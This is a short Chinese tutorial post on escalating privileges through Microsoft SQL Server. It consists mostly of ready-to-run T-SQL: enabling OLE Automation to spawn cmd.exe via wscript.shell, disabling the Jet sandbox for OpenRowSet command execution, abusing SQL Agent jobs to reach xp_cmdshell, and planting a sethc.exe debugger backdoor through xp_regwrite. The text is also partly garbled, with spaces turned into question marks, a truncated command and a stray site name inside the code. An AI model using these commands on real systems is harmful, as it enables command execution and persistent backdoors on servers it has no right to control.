SQL Server从0到1——提权
2024-01-08 13:50:41
xp_cmdshell提权
xp_cmdshell在前面写webshell已经讲解过了,在这里不在重复
sp_oacreate提权
启用:
EXEC?sp_configure?'show?advanced?options',?1;
RECONFIGURE?WITH?OVERRIDE;
EXEC?sp_configure?'Ole?Automation?Procedures',?1;
RECONFIGURE?WITH?OVERRIDE;
关闭:
EXEC?sp_configure?'show?advanced?options',?1;
RECONFIGURE?WITH?OVERRIDE;
EXEC?sp_configure?'Ole?Automation?Procedures',?0;
RECONFIGURE?WITH?OVERRIDE;
执行:
declare?@shell?int?exec?sp_oacreate?'wscript.shell',@shell?output
exec?sp_oamethod
@shell,'run',null,'c:\windows\system32\cmd.exe?/c?whoami?>c:\\1.txt'
?
沙盒提权
1.?exec?master..xp_regwrite?'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;
2.?exec?master.dbo.xp_regread?'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines',?'SandBoxMode'
沙盒模式SandBoxMode参数含义(默认是2)
`0`:在任何所有者中禁止启用安全模式
`1`?:为仅在允许范围内
`2`?:必须在access模式下
`3`:完全开启
执行命令:
Select?*?From?OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Databasec:\windows\system32\i
?
public
USE?msdb
EXEC?sp_add_job?@job_name?=?'GetSystemOnSQL',?www.2cto.com
@enabled?=?1,
@description?=?'This?will?give?a?low?privileged?user?access?to
xp_cmdshell',
@delete_level?=?1
EXEC?sp_add_jobstep?@job_name?=?'GetSystemOnSQL',
@step_name?=?'Exec?my?sql',
@subsystem?=?'TSQL',
@command?=?'exec?master..xp_execresultset?N''select?''''exec
master..xp_cmdshell?"dir?>?c:\agent-job-results.txt"'''''',N''Master'''
EXEC?sp_add_jobserver?@job_name?=?'GetSystemOnSQL',
@server_name?=?'SERVER_NAME'
EXEC?sp_start_job?@job_name?=?'GetSystemOnSQL'
xp_regwrite
exec?master..xp_regwrite?'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Image?File?Execution
Options\sethc.EXE','Debugger','REG_SZ','C:\WINDOWS\explorer.exe';
文章来源:https://blog.csdn.net/2301_80520893/article/details/135339463
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:veading@qq.com进行投诉反馈,一经查实,立即删除!
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:veading@qq.com进行投诉反馈,一经查实,立即删除!